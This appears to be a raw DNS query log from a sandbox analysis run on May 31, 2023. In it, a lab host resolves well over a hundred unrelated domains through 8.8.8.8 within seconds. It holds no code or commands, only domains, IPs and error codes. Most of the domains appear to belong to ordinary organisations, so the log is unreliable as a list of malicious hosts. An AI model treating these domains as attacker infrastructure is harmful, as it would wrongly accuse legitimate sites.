                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.374963999 CEST8.8.8.8192.168.2.30xaa32No error (0)orlyhotel.com172.67.156.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.396867990 CEST8.8.8.8192.168.2.30xb18aNo error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.439677954 CEST8.8.8.8192.168.2.30xe811Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.441524029 CEST8.8.8.8192.168.2.30x8107No error (0)wahw.com.au54.194.190.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.463304043 CEST8.8.8.8192.168.2.30x602No error (0)shesfit.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.463304043 CEST8.8.8.8192.168.2.30x602No error (0)shesfit.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.469790936 CEST8.8.8.8192.168.2.30x80edNo error (0)magicomm.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.486546040 CEST8.8.8.8192.168.2.30xe3f6No error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.486546040 CEST8.8.8.8192.168.2.30xe3f6No error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.494606018 CEST8.8.8.8192.168.2.30xe171No error (0)mjrcpas.com47.91.170.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.498737097 CEST8.8.8.8192.168.2.30x26bdNo error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.573601961 CEST8.8.8.8192.168.2.30x1567No error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.630461931 CEST8.8.8.8192.168.2.30x83dNo error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.645191908 CEST8.8.8.8192.168.2.30x2670Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.652173042 CEST8.8.8.8192.168.2.30x40d9Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.688699961 CEST8.8.8.8192.168.2.30x7e53No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.725265980 CEST8.8.8.8192.168.2.30x4121No error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.725265980 CEST8.8.8.8192.168.2.30x4121No error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.725265980 CEST8.8.8.8192.168.2.30x4121No error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.734749079 CEST8.8.8.8192.168.2.30x523dServer failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.757832050 CEST8.8.8.8192.168.2.30x713fNo error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.831424952 CEST8.8.8.8192.168.2.30xc09bNo error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.837033033 CEST8.8.8.8192.168.2.30x13aServer failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.847245932 CEST8.8.8.8192.168.2.30x4cbcNo error (0)likangds.com23.225.40.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.883352041 CEST8.8.8.8192.168.2.30x4500Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.905829906 CEST8.8.8.8192.168.2.30xa665Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.927143097 CEST8.8.8.8192.168.2.30xe9a0No error (0)lyto.net188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.927143097 CEST8.8.8.8192.168.2.30xe9a0No error (0)lyto.net188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.940234900 CEST8.8.8.8192.168.2.30x7c84Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.978024960 CEST8.8.8.8192.168.2.30xd1f3No error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.981987000 CEST8.8.8.8192.168.2.30x82a4Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.070480108 CEST8.8.8.8192.168.2.30x3d15Server failure (2)awal.wsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.093915939 CEST8.8.8.8192.168.2.30x8c01No error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.100748062 CEST8.8.8.8192.168.2.30xdb2bNo error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.574951887 CEST8.8.8.8192.168.2.30xfdadNo error (0)nels.co.uk5.134.13.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.609724045 CEST8.8.8.8192.168.2.30xa830No error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.610131979 CEST8.8.8.8192.168.2.30xa722Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.666342974 CEST8.8.8.8192.168.2.30x523bNo error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.666342974 CEST8.8.8.8192.168.2.30x523bNo error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.666342974 CEST8.8.8.8192.168.2.30x523bNo error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.666342974 CEST8.8.8.8192.168.2.30x523bNo error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.667171955 CEST8.8.8.8192.168.2.30x2670Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.683176041 CEST8.8.8.8192.168.2.30x20a4No error (0)ifesnet.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.683176041 CEST8.8.8.8192.168.2.30x20a4No error (0)ifesnet.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.686012983 CEST8.8.8.8192.168.2.30x7c06No error (0)dayvo.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.686012983 CEST8.8.8.8192.168.2.30x7c06No error (0)dayvo.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.709460020 CEST8.8.8.8192.168.2.30x1051No error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.725107908 CEST8.8.8.8192.168.2.30xb835No error (0)wvs-net.de188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.725107908 CEST8.8.8.8192.168.2.30xb835No error (0)wvs-net.de188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.725132942 CEST8.8.8.8192.168.2.30xa204No error (0)semuk.com86.105.245.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.802655935 CEST8.8.8.8192.168.2.30xd842No error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.802655935 CEST8.8.8.8192.168.2.30xd842No error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.803340912 CEST8.8.8.8192.168.2.30x7ad3No error (0)lyto.net188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.803340912 CEST8.8.8.8192.168.2.30x7ad3No error (0)lyto.net188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.808327913 CEST8.8.8.8192.168.2.30xe826No error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.809731007 CEST8.8.8.8192.168.2.30xd095No error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.834063053 CEST8.8.8.8192.168.2.30x2295No error (0)zugseil.com92.42.191.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.839376926 CEST8.8.8.8192.168.2.30xa730No error (0)pcoyuncu.com213.142.131.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.840590954 CEST8.8.8.8192.168.2.30xf7b5No error (0)ascc.org.au203.210.102.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.842596054 CEST8.8.8.8192.168.2.30x646fNo error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.846884966 CEST8.8.8.8192.168.2.30xc44dNo error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.861521006 CEST8.8.8.8192.168.2.30x4e22No error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.862510920 CEST8.8.8.8192.168.2.30xf9c0No error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.862600088 CEST8.8.8.8192.168.2.30x6afaNo error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.862600088 CEST8.8.8.8192.168.2.30x6afaNo error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.862600088 CEST8.8.8.8192.168.2.30x6afaNo error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.862600088 CEST8.8.8.8192.168.2.30x6afaNo error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.862884045 CEST8.8.8.8192.168.2.30x9a34No error (0)snf.it95.174.22.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.865792990 CEST8.8.8.8192.168.2.30xf392No error (0)rast.se93.188.2.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.873681068 CEST8.8.8.8192.168.2.30xbcdcNo error (0)shiner.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.873681068 CEST8.8.8.8192.168.2.30xbcdcNo error (0)shiner.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.880433083 CEST8.8.8.8192.168.2.30x1858No error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.880433083 CEST8.8.8.8192.168.2.30x1858No error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.888772964 CEST8.8.8.8192.168.2.30xf699Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.899574041 CEST8.8.8.8192.168.2.30xc5d0No error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.899574041 CEST8.8.8.8192.168.2.30xc5d0No error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.903418064 CEST8.8.8.8192.168.2.30x7479Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.914431095 CEST8.8.8.8192.168.2.30x86b7No error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.914431095 CEST8.8.8.8192.168.2.30x86b7No error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.915545940 CEST8.8.8.8192.168.2.30x5a08No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.920070887 CEST8.8.8.8192.168.2.30x73cNo error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.922283888 CEST8.8.8.8192.168.2.30x4f3aNo error (0)kustnara.com13.248.155.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.922283888 CEST8.8.8.8192.168.2.30x4f3aNo error (0)kustnara.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.922283888 CEST8.8.8.8192.168.2.30x4f3aNo error (0)kustnara.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.922283888 CEST8.8.8.8192.168.2.30x4f3aNo error (0)kustnara.com76.223.27.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.929066896 CEST8.8.8.8192.168.2.30x5addNo error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.941302061 CEST8.8.8.8192.168.2.30x36c3Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.952570915 CEST8.8.8.8192.168.2.30x667fNo error (0)zupraha.cz77.78.104.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.954695940 CEST8.8.8.8192.168.2.30x6ddaNo error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.956758976 CEST8.8.8.8192.168.2.30x3872No error (0)biosolve.com151.101.130.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.968252897 CEST8.8.8.8192.168.2.30xa777No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.968341112 CEST8.8.8.8192.168.2.30x401eName error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.968388081 CEST8.8.8.8192.168.2.30x747dNo error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.972744942 CEST8.8.8.8192.168.2.30x27beNo error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.972744942 CEST8.8.8.8192.168.2.30x27beNo error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.979043007 CEST8.8.8.8192.168.2.30x73b9No error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.980675936 CEST8.8.8.8192.168.2.30xc4e8No error (0)aiolos-sa.gr188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.980675936 CEST8.8.8.8192.168.2.30xc4e8No error (0)aiolos-sa.gr188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.983656883 CEST8.8.8.8192.168.2.30x9669No error (0)enguita.net195.5.116.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.992652893 CEST8.8.8.8192.168.2.30x91ebNo error (0)avse.hu185.129.138.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.993329048 CEST8.8.8.8192.168.2.30xc5cNo error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:01.994709969 CEST8.8.8.8192.168.2.30xf29fNo error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.006613970 CEST8.8.8.8192.168.2.30x8677No error (0)floopis.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.007371902 CEST8.8.8.8192.168.2.30xae6dNo error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.008789062 CEST8.8.8.8192.168.2.30x7743Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.011897087 CEST8.8.8.8192.168.2.30x420eNo error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.011897087 CEST8.8.8.8192.168.2.30x420eNo error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.011897087 CEST8.8.8.8192.168.2.30x420eNo error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.011897087 CEST8.8.8.8192.168.2.30x420eNo error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.013564110 CEST8.8.8.8192.168.2.30x9e96No error (0)ssm.ch93.189.66.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.023000956 CEST8.8.8.8192.168.2.30xab3bNo error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.030981064 CEST8.8.8.8192.168.2.30xed18No error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.033094883 CEST8.8.8.8192.168.2.30x2b35No error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.033094883 CEST8.8.8.8192.168.2.30x2b35No error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.033584118 CEST8.8.8.8192.168.2.30xe2f5No error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.033584118 CEST8.8.8.8192.168.2.30xe2f5No error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.033584118 CEST8.8.8.8192.168.2.30xe2f5No error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.035938025 CEST8.8.8.8192.168.2.30x41bfNo error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.042063951 CEST8.8.8.8192.168.2.30xc396No error (0)onzcda.com35.186.238.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.073522091 CEST8.8.8.8192.168.2.30x5ad0No error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.073522091 CEST8.8.8.8192.168.2.30x5ad0No error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.073522091 CEST8.8.8.8192.168.2.30x5ad0No error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.079790115 CEST8.8.8.8192.168.2.30xcbc2No error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.080143929 CEST8.8.8.8192.168.2.30xaedNo error (0)mondopp.net173.231.184.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.084161997 CEST8.8.8.8192.168.2.30x12b6No error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.084161997 CEST8.8.8.8192.168.2.30x12b6No error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.085357904 CEST8.8.8.8192.168.2.30xd9a4No error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.085357904 CEST8.8.8.8192.168.2.30xd9a4No error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.089565992 CEST8.8.8.8192.168.2.30x5588Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.093179941 CEST8.8.8.8192.168.2.30x6dc7No error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.093179941 CEST8.8.8.8192.168.2.30x6dc7No error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.093179941 CEST8.8.8.8192.168.2.30x6dc7No error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.101319075 CEST8.8.8.8192.168.2.30x9f87No error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.118587017 CEST8.8.8.8192.168.2.30xec0eNo error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.120394945 CEST8.8.8.8192.168.2.30x5b44Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.120991945 CEST8.8.8.8192.168.2.30x6deName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.125576019 CEST8.8.8.8192.168.2.30x687aNo error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.131072998 CEST8.8.8.8192.168.2.30xf988No error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.143682957 CEST8.8.8.8192.168.2.30xc08eName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.150198936 CEST8.8.8.8192.168.2.30xb060Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.157227993 CEST8.8.8.8192.168.2.30xe21dNo error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.171372890 CEST8.8.8.8192.168.2.30xf9cdName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.174653053 CEST8.8.8.8192.168.2.30x25a4Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.183060884 CEST8.8.8.8192.168.2.30x2d71No error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.183360100 CEST8.8.8.8192.168.2.30x69b6No error (0)yasuma.com61.200.81.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.195245981 CEST8.8.8.8192.168.2.30xf73fName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.216037989 CEST8.8.8.8192.168.2.30x3ba1Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.226671934 CEST8.8.8.8192.168.2.30x30c1No error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.228548050 CEST8.8.8.8192.168.2.30xecdfName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.241089106 CEST8.8.8.8192.168.2.30x4472No error (0)sigtoa.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.241089106 CEST8.8.8.8192.168.2.30x4472No error (0)sigtoa.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.272860050 CEST8.8.8.8192.168.2.30x69aeNo error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.272860050 CEST8.8.8.8192.168.2.30x69aeNo error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.294162035 CEST8.8.8.8192.168.2.30xa6a5No error (0)arowines.com75.2.18.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.298538923 CEST8.8.8.8192.168.2.30xfca8No error (0)cnti.krsn.ru217.74.161.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.303870916 CEST8.8.8.8192.168.2.30xc580No error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.303925991 CEST8.8.8.8192.168.2.30x2132No error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.303925991 CEST8.8.8.8192.168.2.30x2132No error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.303925991 CEST8.8.8.8192.168.2.30x2132No error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.311913013 CEST8.8.8.8192.168.2.30x190fNo error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.311913013 CEST8.8.8.8192.168.2.30x190fNo error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.364589930 CEST8.8.8.8192.168.2.30x48e5Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.372456074 CEST8.8.8.8192.168.2.30xc0eeNo error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.372456074 CEST8.8.8.8192.168.2.30xc0eeNo error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
